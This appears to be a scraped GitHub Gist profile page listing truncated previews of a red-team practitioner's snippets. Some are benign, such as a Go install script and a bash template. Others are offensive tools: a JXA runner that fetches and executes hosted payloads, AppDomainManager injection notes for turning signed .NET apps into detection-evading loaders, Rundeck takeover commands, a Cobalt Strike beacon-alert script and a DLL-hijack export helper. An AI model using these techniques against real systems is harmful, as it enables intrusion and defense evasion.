thesubtlety /
Created May 19, 2023 13:43 — forked from HackingLZ/
import re
import zipfile
import argparse
from urllib.parse import urlparse
from colorama import Fore, Style, init
thesubtlety /
Created January 5, 2023 20:15
Install go to home dir on debian
# Install golang to home dir
LATEST="$(curl -s"
wget "$DL_URL" -P "$GOUTIL"
rm -rf "$GOPATH" && tar -C $HOME -xzf "$GOUTIL/$DL_PKG"
export PATH=$PATH:$HOME/go/bin
thesubtlety /
Created November 18, 2022 23:43
shell script template
#!/usr/bin/env bash
set -o errexit
set -o nounset
set -o pipefail
if [[ "${TRACE-0}" == "1" ]]; then
set -o xtrace
thesubtlety / jxarun.swift
Last active September 10, 2023 19:25
Run jxa from file http stdin
// adapted from cedowns jxa-runner
import Foundation
import Cocoa
import OSAKit
// for hosted .js JXA payloads: ./JXARunner -u [url_to_jxa_payload]
// for local .js JXA payloads: ./JXARunner -f [path_to_jxa_payload]
// echo 'jxacode' | ./runner -s
thesubtlety / jxarunner.m
Created September 30, 2022 18:15
Obj JXA runner
#import <Foundation/Foundation.h>
#import <Appkit/AppKit.h>
#import <CoreFoundation/CoreFoundation.h>
#import <OSAKit/OSAKit.h>
#import <Cocoa/Cocoa.h>
#import <OSAKit/OSALanguage.h>
#import <Foundation/NSString.h>
#include <string.h>
//jxarunner file.js
thesubtlety /
Created April 25, 2022 14:53 — forked from djhohnstein/
AppDomainManager Injection

Let's turn Any .NET Application into an LOL Bin

We can do this by experimenting with .config files.

Many defenders detect renamed files by matching the Original Filename to the Process Name.

In this example, we don't have to rename anything. We simply coerce a trusted signed app to load our Assembly.

We do this by directing the application to read a config file we provide.

thesubtlety /
Created October 14, 2021 15:06
Rundeck Takeover Reference

Rundeck Compromise

Reference notes to run commands on nodes controlled by Rundeck given a valid API token.


# Identify projects
curl -H $TOKEN $RUNDECK/api/16/projects/ -H accept:application/json | jq  .
thesubtlety / stalebacon.cna
Created March 26, 2021 21:59
Stale beacon slacker, only messages once
# CNA script to alert on dead beacons. Doesn't repeat messages.
# author: noah @thesubtlety
# credit - bluescreenofjeff
$webhook_url = "";
$slack_channel = "#crackers";
%beacon_status = %();
# default stale value of 5 minutes (300000ms)
$stale_value = 300000;
thesubtlety /
Last active August 13, 2020 23:15
tl;dr natlas/docker install
thesubtlety / Get-Exports.ps1
Created February 12, 2020 17:59
DLL Hijack with exports
function Get-Exports {
Get-Exports, fetches DLL exports and optionally provides
C++ wrapper output (identical to ExportsToC++ but without
needing VS and a compiled binary). To do this it reads DLL
bytes into memory and then parses them (no LoadLibraryEx).
Because of this you can parse x32/x64 DLLs regardless of
the bitness of PowerShell.